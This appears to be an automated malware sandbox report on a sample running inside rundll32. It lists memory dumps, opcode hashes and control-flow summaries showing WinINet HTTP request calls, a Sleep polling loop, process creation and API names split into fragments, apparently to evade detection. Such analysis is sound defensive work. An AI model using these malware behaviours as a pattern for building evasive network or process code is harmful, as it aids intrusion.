                                                                                                                                                                  • Associated: 00000006.00000002.3710698216.000000000455E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_43c0000_rundll32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                  • Opcode ID: 08ebc100d5c398e79482a9d56a44feb6a11afe38c01eecd574776a7c0b99d549
                                                                                                                                                                  • Instruction ID: 5dfd344c19f6990280b809c2849a7e9a732aae6eaf5760b15fd393f0afb39f87
                                                                                                                                                                  • Opcode Fuzzy Hash: 08ebc100d5c398e79482a9d56a44feb6a11afe38c01eecd574776a7c0b99d549
                                                                                                                                                                  • Instruction Fuzzy Hash: 01900225242441527945B158440450740069BF0245795C013A1416954C866AE956D621
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3710698216.00000000043C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043C0000, based on PE: true
                                                                                                                                                                  • Associated: 00000006.00000002.3710698216.00000000044E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3710698216.00000000044ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3710698216.000000000455E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_43c0000_rundll32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                  • Opcode ID: e49f9ce71363209998fca880ec814bd6972a9de67d21cadaf22030c47bd7b3bf
                                                                                                                                                                  • Instruction ID: 8e835938f9dc387ea649d441e6abcc95a33fb47b631adac547fc0038103c9b84
                                                                                                                                                                  • Opcode Fuzzy Hash: e49f9ce71363209998fca880ec814bd6972a9de67d21cadaf22030c47bd7b3bf
                                                                                                                                                                  • Instruction Fuzzy Hash: 4B90023520140413F5117158450470700098BE0245F95C413A042655CD979ADA52A121
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3710698216.00000000043C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043C0000, based on PE: true
                                                                                                                                                                  • Associated: 00000006.00000002.3710698216.00000000044E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3710698216.00000000044ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3710698216.000000000455E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_43c0000_rundll32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                  • Opcode ID: b7dbc0b81287541b7a28e3f608aec81c5d4083a605d53fe7e1fb29a678992ae7
                                                                                                                                                                  • Instruction ID: ab9fe97fa546acfa74392035078212a67ebc553a97858a776a1989a4c36d3d97
                                                                                                                                                                  • Opcode Fuzzy Hash: b7dbc0b81287541b7a28e3f608aec81c5d4083a605d53fe7e1fb29a678992ae7
                                                                                                                                                                  • Instruction Fuzzy Hash: A990027520140402F5407158440474600058BE0305F55C012A5066558E879DDED56665
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3710698216.00000000043C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043C0000, based on PE: true
                                                                                                                                                                  • Associated: 00000006.00000002.3710698216.00000000044E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3710698216.00000000044ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3710698216.000000000455E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_43c0000_rundll32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                  • Opcode ID: 45d699f2339a0b0bb5d99443bcad2aa10798124446b401dca36200abbfe79203
                                                                                                                                                                  • Instruction ID: da646d6bb82aadb9ea3417b9f3c6a2dd316f05c1a623d19aec97162573c6e872
                                                                                                                                                                  • Opcode Fuzzy Hash: 45d699f2339a0b0bb5d99443bcad2aa10798124446b401dca36200abbfe79203
                                                                                                                                                                  • Instruction Fuzzy Hash: 1A90026534140442F50071584414B060005CBF1305F55C016E1066558D875DDD526126
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3710698216.00000000043C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043C0000, based on PE: true
                                                                                                                                                                  • Associated: 00000006.00000002.3710698216.00000000044E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3710698216.00000000044ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3710698216.000000000455E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_43c0000_rundll32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                  • Opcode ID: 1e5c171031e28ec4189dd760d6faa974b85164ff5f34931c012a6729536dbd1a
                                                                                                                                                                  • Instruction ID: e90b87a044834980bdf480819d1f5b54f2b47db546bc6a96d54f44a157f0c4f4
                                                                                                                                                                  • Opcode Fuzzy Hash: 1e5c171031e28ec4189dd760d6faa974b85164ff5f34931c012a6729536dbd1a
                                                                                                                                                                  • Instruction Fuzzy Hash: 3D900225211C0042F60075684C14B0700058BE0307F55C116A0156558CCA59D9615521
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3710698216.00000000043C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043C0000, based on PE: true
                                                                                                                                                                  • Associated: 00000006.00000002.3710698216.00000000044E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3710698216.00000000044ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3710698216.000000000455E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_43c0000_rundll32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                  • Opcode ID: 5714598df0fb29fbfacc608b196d97b3ad40c8709d50b117045488643ff9b885
                                                                                                                                                                  • Instruction ID: efb853235fc1a7b49fb0a6bb0b263a9064dafde8d2a5bd9bdebfa81d77f6c3d2
                                                                                                                                                                  • Opcode Fuzzy Hash: 5714598df0fb29fbfacc608b196d97b3ad40c8709d50b117045488643ff9b885
                                                                                                                                                                  • Instruction Fuzzy Hash: 3B90043D311400033505F55C07045070047CFF5355355C033F1017554CD775DD715131
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3710698216.00000000043C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043C0000, based on PE: true
                                                                                                                                                                  • Associated: 00000006.00000002.3710698216.00000000044E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3710698216.00000000044ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3710698216.000000000455E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_43c0000_rundll32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                  • Opcode ID: 003efe39a4af6c5ecde742f9bcb20d7b3f3226e24c170690d139d71157749f43
                                                                                                                                                                  • Instruction ID: ec9eccf87c59279c9c348ab7c6094445047eba8a46b84fbd596d59e7a64dabb5
                                                                                                                                                                  • Opcode Fuzzy Hash: 003efe39a4af6c5ecde742f9bcb20d7b3f3226e24c170690d139d71157749f43
                                                                                                                                                                  • Instruction Fuzzy Hash: 9890026520240003750571584414616400A8BF0205B55C022E1016594DC669D9916125
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3710698216.00000000043C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043C0000, based on PE: true
                                                                                                                                                                  • Associated: 00000006.00000002.3710698216.00000000044E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3710698216.00000000044ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3710698216.000000000455E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_43c0000_rundll32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                  • Opcode ID: 160f56ba406fe82ee6820e441f5176987ce39e6f9e706c4fa45b1aae12b444b3
                                                                                                                                                                  • Instruction ID: 91aa0f9fb69c157797bf3221064a721100707a9f4630f9aaaee475b1a37d84f1
                                                                                                                                                                  • Opcode Fuzzy Hash: 160f56ba406fe82ee6820e441f5176987ce39e6f9e706c4fa45b1aae12b444b3
                                                                                                                                                                  • Instruction Fuzzy Hash: 1790023520544842F54071584404A4600158BE0309F55C012A0066698D9769DE55B661
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3710698216.00000000043C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043C0000, based on PE: true
                                                                                                                                                                  • Associated: 00000006.00000002.3710698216.00000000044E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3710698216.00000000044ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3710698216.000000000455E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_43c0000_rundll32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                  • Opcode ID: f45676305e67c8ed8229375806923b28fe237cf6c0115f761247a799b2fd516d
                                                                                                                                                                  • Instruction ID: 48f5a68f49254d3c39a5a4578376263f04ce95111761525ab0558967ef8f33cb
                                                                                                                                                                  • Opcode Fuzzy Hash: f45676305e67c8ed8229375806923b28fe237cf6c0115f761247a799b2fd516d
                                                                                                                                                                  • Instruction Fuzzy Hash: E690023520140802F5807158440464A00058BE1305F95C016A0027658DCB59DB5977A1
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3710698216.00000000043C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043C0000, based on PE: true
                                                                                                                                                                  • Associated: 00000006.00000002.3710698216.00000000044E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3710698216.00000000044ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3710698216.000000000455E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_43c0000_rundll32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                  • Opcode ID: 2dcfbeb922c91a3f4b9ac82ac4f54d5ef21e0a0644bc18d51b7e210013722a77
                                                                                                                                                                  • Instruction ID: 2b52c2cd2883ba6bfcb54fd577b78fe945026f7f4c18d5ba849c9dfa0ed27490
                                                                                                                                                                  • Opcode Fuzzy Hash: 2dcfbeb922c91a3f4b9ac82ac4f54d5ef21e0a0644bc18d51b7e210013722a77
                                                                                                                                                                  • Instruction Fuzzy Hash: DC90023560550402F5007158451470610058BE0205F65C412A042656CD87D9DA5165A2
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                  • HttpOpenRequestA.WININET(RequestA,OpenRequestA,HttpOpenRequestA,00000000,?,?,?,?,?,?,?,00000000), ref: 0013AAC8
                                                                                                                                                                  • HttpSendRequestA.WININET(RequestA,SendRequestA,HttpSendRequestA,00000000,?,?,?,?,00000000), ref: 0013AB3C
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3695174278.0000000000120000.00000040.80000000.00040000.00000000.sdmp, Offset: 00120000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_120000_rundll32.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: HttpRequest$OpenSend
                                                                                                                                                                  • String ID: Http$Http$HttpOpenRequestA$HttpOpenRequestA$HttpSendRequestA$HttpSendRequestA$InternetReadFile$Open$OpenRequestA$ReadFile$Requ$Requ$RequestA$RequestA$Send$SendRequestA$estA$estA$rnetReadFile
                                                                                                                                                                  • API String ID: 3451552748-2054597388
                                                                                                                                                                  • Opcode ID: 0dbb174b7c17f2240d41047fbca391ad1d8e60d455b670aa6199345fd679cfeb
                                                                                                                                                                  • Instruction ID: 26d8802f6d6f51591caf79fc4a7a8437a52cfdec6e8e5f3cd6ecc2c3f86cd01d
                                                                                                                                                                  • Opcode Fuzzy Hash: 0dbb174b7c17f2240d41047fbca391ad1d8e60d455b670aa6199345fd679cfeb
                                                                                                                                                                  • Instruction Fuzzy Hash: 4A413DB2904159AFCB14DF98D941AEF7BB9EF58310F148148FD59A7205D371AD10CBE2
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 120 13aa60-13aa96 121 13aa9f-13aaa6 120->121 122 13aa9a call 13b000 120->122 123 13aaa8-13aace HttpOpenRequestA 121->123 124 13aacf-13aad5 121->124 122->121
                                                                                                                                                                  APIs
                                                                                                                                                                  • HttpOpenRequestA.WININET(RequestA,OpenRequestA,HttpOpenRequestA,00000000,?,?,?,?,?,?,?,00000000), ref: 0013AAC8
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3695174278.0000000000120000.00000040.80000000.00040000.00000000.sdmp, Offset: 00120000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_120000_rundll32.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: HttpOpenRequest
                                                                                                                                                                  • String ID: Http$HttpOpenRequestA$HttpOpenRequestA$Open$OpenRequestA$Requ$RequestA$estA
                                                                                                                                                                  • API String ID: 1984915467-4016285707
                                                                                                                                                                  • Opcode ID: fea90beabff67b2b567d8da6d4b6fac2dcdbdf4ce93c97183384f69e53b9be53
                                                                                                                                                                  • Instruction ID: b1187466249586086c291591373f9f3cdcefcdafa15026d99775b607fbf3cdc2
                                                                                                                                                                  • Opcode Fuzzy Hash: fea90beabff67b2b567d8da6d4b6fac2dcdbdf4ce93c97183384f69e53b9be53
                                                                                                                                                                  • Instruction Fuzzy Hash: FC01E9B2905159AFCB04DF98D941DEF7BB9EB48210F158288FD48A7205D630ED10CBE1
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 125 13aa57-13aaa6 call 13b000 128 13aaa8-13aace HttpOpenRequestA 125->128 129 13aacf-13aad5 125->129
                                                                                                                                                                  APIs
                                                                                                                                                                  • HttpOpenRequestA.WININET(RequestA,OpenRequestA,HttpOpenRequestA,00000000,?,?,?,?,?,?,?,00000000), ref: 0013AAC8
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3695174278.0000000000120000.00000040.80000000.00040000.00000000.sdmp, Offset: 00120000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_120000_rundll32.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: HttpOpenRequest
                                                                                                                                                                  • String ID: Http$HttpOpenRequestA$HttpOpenRequestA$Open$OpenRequestA$Requ$RequestA$estA
                                                                                                                                                                  • API String ID: 1984915467-4016285707
                                                                                                                                                                  • Opcode ID: ac8016c6176eb5f9dfdab1e198786557e5a61b74c5e8e088a9b1d181034b10df
                                                                                                                                                                  • Instruction ID: ea464e779caafa6e21b6ef12fe90ceafc0fd716e284acce3fa606488a02fcc11
                                                                                                                                                                  • Opcode Fuzzy Hash: ac8016c6176eb5f9dfdab1e198786557e5a61b74c5e8e088a9b1d181034b10df
                                                                                                                                                                  • Instruction Fuzzy Hash: A10105B2904159AFCB14DF98D981EEF7BB9EB48310F158248FE19A7204D731AA10CBA1
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 130 13aae0-13ab16 131 13ab1f-13ab26 130->131 132 13ab1a call 13b000 130->132 133 13ab43-13ab49 131->133 134 13ab28-13ab42 HttpSendRequestA 131->134 132->131
                                                                                                                                                                  APIs
                                                                                                                                                                  • HttpSendRequestA.WININET(RequestA,SendRequestA,HttpSendRequestA,00000000,?,?,?,?,00000000), ref: 0013AB3C
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3695174278.0000000000120000.00000040.80000000.00040000.00000000.sdmp, Offset: 00120000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_120000_rundll32.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: HttpRequestSend
                                                                                                                                                                  • String ID: Http$HttpSendRequestA$HttpSendRequestA$Requ$RequestA$Send$SendRequestA$estA
                                                                                                                                                                  • API String ID: 360639707-2503632690
                                                                                                                                                                  • Opcode ID: db97a3a7caecdf95fe0a304b753d44bd81bfc0f21146fd473aad3fd0d43d0554
                                                                                                                                                                  • Instruction ID: 4f2a83f37058c72b29d57c02b2547c7b524bff2d41e91e5060eb01111efec3f3
                                                                                                                                                                  • Opcode Fuzzy Hash: db97a3a7caecdf95fe0a304b753d44bd81bfc0f21146fd473aad3fd0d43d0554
                                                                                                                                                                  • Instruction Fuzzy Hash: C5014FB2905119AFCB04DF98D841AAFBBB8EB54210F148189FD18A7204D770EE10CBE1
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 135 13a9e0-13aa26 call 13b000 138 13aa28-13aa4e InternetConnectA 135->138 139 13aa4f-13aa55 135->139
                                                                                                                                                                  APIs
                                                                                                                                                                  • InternetConnectA.WININET(ConnectA,rnetConnectA,InternetConnectA,00000000,?,?,?,?,?,?,?,00000000), ref: 0013AA48
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3695174278.0000000000120000.00000040.80000000.00040000.00000000.sdmp, Offset: 00120000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_120000_rundll32.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ConnectInternet
                                                                                                                                                                  • String ID: Conn$ConnectA$Inte$InternetConnectA$ectA$rnet$rnetConnectA
                                                                                                                                                                  • API String ID: 3050416762-1024195942
                                                                                                                                                                  • Opcode ID: 5a91d16494d0f57e6db0b04c43c500e05e142fe6b6b4993dc2c2e1d1dc4bd2c0
                                                                                                                                                                  • Instruction ID: ea3180bfba74327497d6e2389077a6c241ece9f32a18261b7dd1d6e980ac4561
                                                                                                                                                                  • Opcode Fuzzy Hash: 5a91d16494d0f57e6db0b04c43c500e05e142fe6b6b4993dc2c2e1d1dc4bd2c0
                                                                                                                                                                  • Instruction Fuzzy Hash: E701E9B2905118AFCB14DF99D941EEF77B8EB48310F154289FE08A7241D630EE10CBE1
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 140 13a970-13a9b1 call 13b000 143 13a9b3-13a9cd InternetOpenA 140->143 144 13a9ce-13a9d4 140->144
                                                                                                                                                                  APIs
                                                                                                                                                                  • InternetOpenA.WININET(rnetOpenA,InternetOpenA,?,?,?), ref: 0013A9C7
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3695174278.0000000000120000.00000040.80000000.00040000.00000000.sdmp, Offset: 00120000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_120000_rundll32.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: InternetOpen
                                                                                                                                                                  • String ID: A$Inte$InternetOpenA$Open$rnet$rnetOpenA
                                                                                                                                                                  • API String ID: 2038078732-3155091674
                                                                                                                                                                  • Opcode ID: a6bd7c6617a6fc903c9a7f07eed257647a49593ccfbd608e88943fc20d551768
                                                                                                                                                                  • Instruction ID: d43def3244b07c3dd38acc49cbcc7e03d79328f7e655c73c69498d7a1df979b9
                                                                                                                                                                  • Opcode Fuzzy Hash: a6bd7c6617a6fc903c9a7f07eed257647a49593ccfbd608e88943fc20d551768
                                                                                                                                                                  • Instruction Fuzzy Hash: 3FF019B2901118AFCB14DF98DC419EBB7B8EF48310F048589FE58A7201E731AE108BE1
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 384 139070-1390b2 call 13bd30 387 1390b8-139108 call 13be00 call 12ace0 call 134e40 384->387 388 13918c-139192 384->388 395 139110-139121 Sleep 387->395 396 139123-139129 395->396 397 139186-13918a 395->397 398 139153-139174 call 138ea0 396->398 399 13912b-13914c call 138c90 396->399 397->388 397->395 403 139179-13917c 398->403 402 139151 399->402 402->403 403->397
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3695174278.0000000000120000.00000040.80000000.00040000.00000000.sdmp, Offset: 00120000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_120000_rundll32.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Sleep
                                                                                                                                                                  • String ID: net.dll$wininet.dll
                                                                                                                                                                  • API String ID: 3472027048-1269752229
                                                                                                                                                                  • Opcode ID: 4ed7dba718d4673b5d47752fdb7b5f00bd3c950a8118c2bc15652b3783fcf2b9
                                                                                                                                                                  • Instruction ID: 031c353cdd9bf1d8247946fdcfc08fc6f72505ad7931cbcf1220c9383cb9b8ba
                                                                                                                                                                  • Opcode Fuzzy Hash: 4ed7dba718d4673b5d47752fdb7b5f00bd3c950a8118c2bc15652b3783fcf2b9
                                                                                                                                                                  • Instruction Fuzzy Hash: 2931A1B2900745BBC724DF64C885FA7B7B8BB48B01F10841DF62E6B245DB74B550CBA4
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 404 139066-13909f 405 1390ab-1390b2 404->405 406 1390a6 call 13bd30 404->406 407 1390b8-139108 call 13be00 call 12ace0 call 134e40 405->407 408 13918c-139192 405->408 406->405 415 139110-139121 Sleep 407->415 416 139123-139129 415->416 417 139186-13918a 415->417 418 139153-139174 call 138ea0 416->418 419 13912b-139151 call 138c90 416->419 417->408 417->415 423 139179-13917c 418->423 419->423 423->417
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3695174278.0000000000120000.00000040.80000000.00040000.00000000.sdmp, Offset: 00120000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_120000_rundll32.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Sleep
                                                                                                                                                                  • String ID: net.dll$wininet.dll
                                                                                                                                                                  • API String ID: 3472027048-1269752229
                                                                                                                                                                  • Opcode ID: 9e09bd85b74c5dd54206fe4df8e4210c36e89762dd7db13e1e2b133ad30921b9
                                                                                                                                                                  • Instruction ID: 20f2451e209fdc82369f61565239d54908108cd05c35a0271874fbe31b82659b
                                                                                                                                                                  • Opcode Fuzzy Hash: 9e09bd85b74c5dd54206fe4df8e4210c36e89762dd7db13e1e2b133ad30921b9
                                                                                                                                                                  • Instruction Fuzzy Hash: 1831C1B2A40745BBC724DF64C8C6FABB7B8BB88701F10811DF6296B245D770A511CBA4
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0013A724
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3695174278.0000000000120000.00000040.80000000.00040000.00000000.sdmp, Offset: 00120000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_120000_rundll32.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CreateInternalProcess
                                                                                                                                                                  • String ID: )sEm
                                                                                                                                                                  • API String ID: 2186235152-348409604
                                                                                                                                                                  • Opcode ID: 493f8ed14f7a509845512e168fdc389fd4f48330c8c50a1367e0c150ceccf56f
                                                                                                                                                                  • Instruction ID: 415c9aae3eeeaf6b656b2276f4b9efeb1b723eaf125cd7d6e549e0b289474073
                                                                                                                                                                  • Opcode Fuzzy Hash: 493f8ed14f7a509845512e168fdc389fd4f48330c8c50a1367e0c150ceccf56f
                                                                                                                                                                  • Instruction Fuzzy Hash: F5F092B2214009AF8B08DF8DDC90DEB73AEAFCC214B558219FA5DD3215D630EC51CBA1
